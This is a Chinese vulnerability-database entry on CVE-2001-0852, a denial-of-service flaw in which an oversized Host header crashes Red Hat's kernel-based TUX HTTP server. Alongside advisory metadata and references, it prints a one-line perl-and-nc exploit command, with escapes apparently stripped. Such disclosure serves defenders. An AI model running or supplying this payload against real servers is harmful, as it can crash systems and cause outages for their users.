Red Hat TUX HTTP Server Oversized Host服务拒绝漏洞

Red Hat TUX HTTP Server Oversized Host服务拒绝漏洞

漏洞ID 1106511 漏洞类型 边界条件错误
发布时间 2001-11-05 更新时间 2005-08-17
图片[1]-Red Hat TUX HTTP Server Oversized Host服务拒绝漏洞-安全小百科CVE编号 CVE-2001-0852
图片[2]-Red Hat TUX HTTP Server Oversized Host服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200112-024
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-024
|漏洞详情
RedHatLinux的TUXHTTPserver2.1.0-2版本存在漏洞。远程攻击者借助超长Host:header导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0nAccept: */*nHost: ) . qq(A) x 6000 .
qq(n)" |nc <ip address> <dest_port>
|参考资料

来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=tux-list&m;=100584714702328&w;=2
来源:BUGTRAQ
名称:20011105RHLinuxTuxHTTPDDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100498100112191&w;=2
来源:REDHAT
名称:RHSA-2001:142
链接:http://www.redhat.com/support/errata/RHSA-2001-142.html
来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=tux-list&m;=100584714702328&w;=2
来源:XF
名称:tux-http-host-dos(7464)
链接:http://xforce.iss.net/static/7464.php
来源:BID
名称:3506
链接:http://www.securityfocus.com/bid/3506

相关推荐: 镜像文件创建漏洞

镜像文件创建漏洞 漏洞ID 1206360 漏洞类型 输入验证 发布时间 2000-09-28 更新时间 2005-05-02 CVE编号 CVE-2000-0354 CNNVD-ID CNNVD-200009-002 漏洞平台 N/A CVSS评分 5.0 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享